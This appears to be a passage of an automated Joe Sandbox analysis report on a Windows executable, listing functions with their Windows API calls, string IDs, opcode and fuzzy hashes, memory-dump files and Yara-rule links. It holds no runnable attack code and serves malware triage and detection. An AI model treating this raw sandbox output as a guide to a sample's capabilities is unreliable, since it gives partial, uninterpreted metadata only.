                                                                        • Opcode ID: d723a9665293e74c71492fb3cac70a3bc48f92968cf52f94e307062bf2672283
                                                                        • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                        • Opcode Fuzzy Hash: d723a9665293e74c71492fb3cac70a3bc48f92968cf52f94e307062bf2672283
                                                                        • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                        Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DestroyWindow.USER32(?), ref: 004558E3
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CreateDestroy
                                                                        • String ID: ,$tooltips_class32
                                                                        • API String ID: 1109047481-3856767331
                                                                        • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                        • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                        • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                        • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                        Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                        • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                        • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                        • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                        • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                        • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                        • GetMenuItemCount.USER32 ref: 00468CFD
                                                                        • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                        • GetCursorPos.USER32(?), ref: 00468D3F
                                                                        • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                        • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                        • String ID: 0
                                                                        • API String ID: 1441871840-4108050209
                                                                        • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                        • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                        • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                        • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                        Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                        • __swprintf.LIBCMT ref: 00460915
                                                                        • __swprintf.LIBCMT ref: 0046092D
                                                                        • _wprintf.LIBCMT ref: 004609E1
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                        • API String ID: 3631882475-2268648507
                                                                        • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                        • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                        • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                        • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                        Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                        • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                        • SendMessageW.USER32 ref: 00471740
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                        • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                        • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                        • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                        • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                        • SendMessageW.USER32 ref: 0047184F
                                                                        • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                        • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                        • String ID:
                                                                        • API String ID: 4116747274-0
                                                                        • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                        • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                        • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                        • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                        Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                        • _wcslen.LIBCMT ref: 00461683
                                                                        • __swprintf.LIBCMT ref: 00461721
                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                        • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                        • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                        • GetParent.USER32(?), ref: 004618C3
                                                                        • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                        • String ID: %s%u
                                                                        • API String ID: 1899580136-679674701
                                                                        • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                        • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                        • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                        • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                        Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                        • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                        • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: InfoItemMenu$Sleep
                                                                        • String ID: 0
                                                                        • API String ID: 1196289194-4108050209
                                                                        • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                        • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                        • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                        • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                        Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 0043143E
                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                        • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                        • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                        • String ID: (
                                                                        • API String ID: 3300687185-3887548279
                                                                        • Opcode ID: 553542ef25fd9631a2b80eb5934e7fdfb419610406a61b9b58c1a15d590a9b60
                                                                        • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                        • Opcode Fuzzy Hash: 553542ef25fd9631a2b80eb5934e7fdfb419610406a61b9b58c1a15d590a9b60
                                                                        • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                        Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                        • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                        • API String ID: 1976180769-4113822522
                                                                        • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                        • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                        • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                        • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                        Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                        • String ID:
                                                                        • API String ID: 461458858-0
                                                                        • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                        • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                        • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                        • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                        Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                        • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                        • DeleteObject.GDI32(?), ref: 004301D0
                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                        • String ID:
                                                                        • API String ID: 3969911579-0
                                                                        • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                        • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                        • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                        • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                        Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                        • String ID: 0
                                                                        • API String ID: 956284711-4108050209
                                                                        • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                        • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                        • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                        • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                        Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                        • String ID: 0.0.0.0
                                                                        • API String ID: 1965227024-3771769585
                                                                        • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
